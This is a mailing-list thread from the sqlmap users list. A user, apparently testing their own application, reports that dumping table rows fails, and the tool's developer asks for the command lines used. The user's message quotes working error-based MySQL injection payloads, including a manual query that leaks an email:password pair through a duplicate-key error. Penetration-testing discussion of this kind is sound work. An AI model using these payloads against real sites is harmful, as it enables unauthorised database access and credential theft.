Hi Cats.
Just tried on MySQL/Error test case and it appears ok.
Could you please send exact command line(s) you've used (without target
url)? Please, use --flush-session as part of the first run.
Kind regards,
Miroslav Stampar
On Sat, Jan 7, 2012 at 1:06 AM, cats <d...@alcor.se> wrote:
> Hello!
>
> I was playing around with sqlmap at home, and I noticed all of a sudden
> that I couldn't get it to extract any columns or rows all of a sudden.
> Database names, current users, tables and such works fine, but
> extracting any columns with --dump doesn't work, and thus not getting
> any rows either. --columns seems to work though, although if I do that
> first and then --dump, it still wont work.
>
> Here's some output from sqlmap:
>
> At revision 4654.
>
> [00:47:11] [INFO] fetching columns 'strTest1, strTest2' for table 'test'
> on database 'testDB'
> [00:47:11] [ERROR] unable to retrieve the number of columns for table
> 'test' on database 'testDB'
> [00:47:11] [ERROR] unable to retrieve the columns for any table on
> database 'testDB'
> [00:47:11] [INFO] fetching column(s) 'strTest1, strTest2' entries for
> table 'test' on database 'testDB'
> [00:47:13] [WARNING] the SQL query provided does not return any output
> [00:47:13] [INFO] analyzing table dump for possible password hashes
> Database: testDB
> Table: test
> [0 entries]
> +----------+----------+
> | strTest1 | strTest2 |
> +----------+----------+
> +----------+----------+
>
>
> The vulnerability used by sqlmap is the following error based one:
>
> ---
> Place: GET
> Parameter: q
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
> Payload: q=2) AND (SELECT 2155 FROM(SELECT
> COUNT(*),CONCAT(0x3a6275763a,(SELECT (CASE WHEN (2155=2155) THEN 1 ELSE
> 0 END)),0x3a6b73693a,FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3039=3039
> ---
>
> And if I try to extract data manually through my browser, then it works
> perfectly:
>
> Notice the extracted data: t...@mail.com:aPassword
>
> Duplicate entry t...@mail.com:aPassword :gtb:1' for key 'group_key'
> select * from test WHERE (StrTest1 = 2) AND (SELECT 2557 FROM(SELECT
> COUNT(*),CONCAT(strTest1,':',strTest2,(SELECT (CASE WHEN (2557=2557)
> THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test
> GROUP BY x)a) AND (8882=8882 AND fuser2 = 2) OR (test1 = 2 AND test2 =
> 2) AND (SELECT 2557 FROM(SELECT
> COUNT(*),CONCAT(strTest1,strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1
> ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY
> x)a) AND (8882=8882)
>
> PS: I tried specifying with "-C strTest1,strTest2" as well
>
> Any ideas? :-)
>
> Thanks in advance, and thanks for a great tool (helps me a lot in my
> work, and saves me time from having to write my own scripts all the time
> to test my software)!
>
>
>
> ------------------------------------------------------------------------------
> Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
> infrastructure or vast IT resources to deliver seamless, secure access to
> virtual desktops. With this all-in-one solution, easily deploy virtual
> desktops for less than the cost of PCs and save 60% on VDI infrastructure
> costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
infrastructure or vast IT resources to deliver seamless, secure access to
virtual desktops. With this all-in-one solution, easily deploy virtual
desktops for less than the cost of PCs and save 60% on VDI infrastructure
costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
